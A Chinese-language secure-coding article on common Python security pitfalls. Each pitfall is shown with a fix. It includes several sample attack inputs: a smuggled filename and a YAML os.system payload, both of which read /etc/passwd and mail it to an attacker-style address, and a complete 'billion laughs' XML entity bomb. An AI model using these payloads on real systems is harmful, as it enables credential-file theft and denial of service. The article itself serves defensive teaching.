python的安全问题有哪些？如何避免或解决？-群英

上一篇：python如何实现三边测量定位？下一篇：Python实现子线程有序执行有什么方法？

python的安全问题有哪些？本文就给大家来聊一聊python的安全问题，例如输入注入、assert 语句、计时攻击、临时文件等等这些都是什么安全问题呢？如何避免或解决？接下来我们具体的了解看看。

一、输入注入

注入攻击非常广泛而且很常见，注入有很多种类，它们影响所有的语言、框架和环境。

SQL 注入是直接编写 SQL 查询（而非使用 ORM）时将字符串字面量与变量混合。可以通过https://www.jb51.net/article/187001.htm
这个链接查看 SQL 注入所有可能发生的复杂方式。

命令注入可能在使用 popen、subprocess、os.system 调用一个进程并从变量中获取参数时发生，当调用本地命令时，有人可能会将某些值设置为恶意值。

下面是个简单的脚本，使用用户提供的文件名调用子进程：

import subprocess

def transcode_file(request, filename):
    command = 'ffmpeg -i "{source}" output_file.mpg'.format(source=filename)
    subprocess.call(command, shell=True)  # a bad idea!

攻击者会将 filename 的值设置为“; cat / etc / passwd | mail them@domain.com 或者其他同样危险的东西。

修复：

如果你使用了 Web 框架，可以用附带的实用程序对输入进行清理，除非有充分的理由，否则不要手动构建 SQL 查询，大多数 ORM 都具有内置的消毒方法。

对于 shell，可以使用 shlex 模块正确地转义输入。

二、assert 语句（Assert statements）

不要使用 assert 语句来防止用户访问不应访问的代码段。

def foo(request, user):
   assert user.is_admin, “user does not have access”
   # secure code...

现在，默认情况下，Python 以 __debug__ 为 true 来执行脚本，但在生产环境中，通常使用优化运行，这将会跳过 assert 语句并直接转到安全代码，而不管用户是否是 is_admin。

修复：

仅在与其他开发人员进行通信时使用 assert 语句，例如在单元测试中或为了防止不正确的 API 使用。

三、计时攻击（Timing attacks）

计时攻击本质上是一种通过计时比较提供值所需时间来暴露行为和算法的方式。计时攻击需要精确性，所以通常不能用于高延迟的远程网络。由于大多数 Web 应用程序涉及可变延迟，因此几乎不可能在 HTTP Web 服务器上编写计时攻击。

但是，如果你有提示输入密码的命令行应用程序，则攻击者可以编写一个简单的脚本来计算将其值与实际密码进行比较所需的时间。

修复：

使用在 Python 3.5 中引入的 secrets.compare_digest 来比较密码和其他私密值。

四、临时文件（Temporary files）

要在 Python 中创建临时文件，通常使用 mktemp() 函数生成一个文件名，然后使用该名称创建一个文件。这是不安全的，因为另一个进程可能会在调用 mktemp() 和随后尝试通过第一个进程创建文件之间的空隙创建一个同名文件。这意味着应用程序可能加载错误的数据或暴露其他的临时数据。

如果调用不正确的方法，则最新版本的 Python 会抛出运行警告。

修复：

如果需要生成临时文件，请使用 tempfile 模块并使用 mkstemp。

五、使用 yaml.load

引用 PyYAML 文档：

警告：使用从不可信源接收到的数据来调用 yaml.load 是不安全的！ yaml.load 和pickle.load 一样强大，所以可以调用任何 Python 函数。

在流行的 Python 项目 Ansible 中这个例子，你可以将此值作为（有效）YAML 提供给 Ansible Vault，它使用文件中提供的参数调用 os.system()。

!!python/object/apply:os.system ["cat /etc/passwd | mail me@hack.c"]

所以，从用户提供的值中有效地加载 YAML 文件会让应用对攻击打开大门。

修复：

总是不优先使用 yaml.safe_load，除非你有一个非常好的理由。

六、解析 XML（Parsing XML）

如果你的应用程序要加载、解析 XML 文件，则你可能正在使用 XML 标准库模块。通过 XML 的攻击大多是 DoS 风格（旨在使系统崩溃而不是泄露数据），这些攻击十分常见，特别是在解析外部（即不可信任的）XML 文件时。

其中有个「billion laughs」，因为他的 payload 通常包含很多（十亿）「lols」。基本上，这个原理是可以在 XML 中使用参照实体，所以当解析器将这个 XML 文件加载到内存中时，它会消耗数 G 大小的内存（RAM）。

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

另一些攻击使用外部实体扩展。XML 支持从外部 URL 引用实体，XML解析器通常会毫无疑问地获取并加载该资源。攻击者可以规避防火墙并访问受限制的资源，因为所有请求都是由内部可信的 IP 地址创建的，而不是来自外部。

需要考虑的另一种情况是依赖的第三方软件包需要解码 XML ，例如配置文件、远程 API。你甚至可能不知道某个依赖关系会将这些类型的攻击置之不理。

修复：

使用 defusedxml 替换标准库模块，它增加了针对这些类型攻击的安全防护。